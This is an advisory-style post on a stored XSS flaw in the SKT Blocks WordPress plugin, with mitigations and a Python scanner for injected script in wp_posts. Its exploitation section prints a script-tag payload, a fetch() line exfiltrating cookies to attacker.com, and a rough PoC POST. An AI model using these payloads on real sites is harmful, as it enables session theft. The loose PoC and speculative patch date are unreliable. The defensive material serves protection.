SKT Blocks (WordPress), Stored XSS, CVE-2025-3276 (Critical)

How CVE-2025-3276 Works

The SKT Blocks plugin for WordPress fails to properly sanitize user-supplied input in the Post Carousel block, allowing authenticated attackers (Contributor-level or higher) to inject malicious JavaScript payloads. When the vulnerable block renders on a page, the script executes in visitors’ browsers, leading to session hijacking, defacement, or malware delivery. Because the plugin also fails to escape the value on output, the payload persists in the database and fires on every page load (stored, or persistent, XSS).

DailyCVE Form:

Platform: WordPress
Version: ≤1.9
Vulnerability: Stored XSS
Severity: Critical
Date: 06/04/2025

Prediction: Patch by 07/15/2025

What Undercode Says:

Exploitation:

1. Payload Injection:

<script>alert(document.cookie)</script>

2. Exfiltrate Cookies:

fetch('https://attacker.com/steal?data='+btoa(document.cookie));

Protection:

1. Immediate Mitigation:

wp plugin deactivate skt-blocks

2. Input Sanitization (PHP):

$clean_input = sanitize_text_field( wp_unslash( $_POST['carousel_content'] ) ); // sanitize when the block is saved
echo esc_html( $clean_input ); // escape again when the block renders; esc_html() is an output-escaping function, not an input sanitizer

3. Content Security Policy (CSP):

# Apache httpd. 'unsafe-inline' must not appear in script-src: it would permit exactly the inline script this bug injects
Header set Content-Security-Policy "default-src 'self'; script-src 'self'"

Detection:

1. Database Scan:

SELECT ID, post_title, post_type FROM wp_posts WHERE post_content LIKE '%<script%';

2. WAF Rule:

# nginx; $args is the query string only, so this does not see the POST body that carries the stored payload
if ($args ~* "<script") { return 403; }
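The database scan above only catches a literal script tag. The scanner below is an added example, not code from the advisory or from the SKT Blocks plugin; it generalizes that check to the other inline-script vectors a stored payload can use in block content (on* event-handler attributes, javascript:/vbscript: URLs, iframe/object/embed tags) and reports which rows of wp_posts need review. The rows are constructed sample data standing in for the result of `SELECT ID, post_type, post_content FROM wp_posts`; the function and class names are my own.

```python
"""Flag wp_posts rows whose content carries inline-script vectors.

Added example for triage after a stored-XSS advisory; not the plugin's code.
"""
import re
from html.parser import HTMLParser

# Tags that load or run script, attributes whose values may hold a URL, and
# URL schemes that execute script when placed in such an attribute.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|vbscript)\s*:", re.IGNORECASE)


class XssIndicatorParser(HTMLParser):
    """Collects script-bearing tags and attributes found in one post body.

    HTMLParser lowercases tag and attribute names, so <ScRiPt> and onERROR
    are matched without extra normalisation. Attribute values are kept as-is.
    """

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, detail) tuples

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(("tag", tag))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event_handler", name))
            elif name in URL_ATTRS and value and SCRIPT_SCHEME.match(value):
                self.findings.append(("script_url", f"{name}={value.strip()}"))


def scan_post(post_content: str) -> list:
    """Return the indicators found in a single post_content string."""
    parser = XssIndicatorParser()
    parser.feed(post_content)
    parser.close()
    return parser.findings


def scan_rows(rows) -> dict:
    """rows: iterable of (ID, post_type, post_content) tuples.

    Returns {ID: findings} for every row with at least one indicator.
    Entity-encoded text such as &lt;script&gt; is data, not markup, and is
    correctly left alone.
    """
    hits = {}
    for post_id, _post_type, content in rows:
        findings = scan_post(content)
        if findings:
            hits[post_id] = findings
    return hits


# Constructed sample rows (not real site data).
SAMPLE_ROWS = [
    (101, "post", '<!-- wp:skt-blocks/post-carousel --><div class="carousel">Latest news</div>'),
    (102, "post", '<div class="carousel"><ScRiPt>alert(1)</ScRiPt></div>'),
    (103, "page", '<div class="carousel"><img src=x onerror="alert(1)"></div>'),
    (104, "wp_block", '<a href="JaVaScRiPt:alert(1)">read more</a>'),
    (105, "post", "<p>Learn about the &lt;script&gt; element</p>"),  # benign, escaped text
]

if __name__ == "__main__":
    for post_id, findings in scan_rows(SAMPLE_ROWS).items():
        print(post_id, findings)
```

Rows 102, 103 and 104 are reported; 101 (a clean carousel block) and 105 (escaped text that only mentions a script tag) are not. A positive hit is a review queue, not proof of compromise: legitimate content from an Administrator may contain the same markup, so check the post author's role and revision history before cleaning.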

Patch Verification:

wp plugin update skt-blocks --version=2.0

Analytics:

– Attack Surface: 50,000+ installs
– Exploitability: Low (requires auth)
– Impact Score: 8.6 (CVSS:4.0)

PoC (Simulated POST request)
import requests
payload = {"post_content": "<script>exploit()</script>"}
requests.post("https://victimsite.com/wp-admin/post.php", data=payload)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
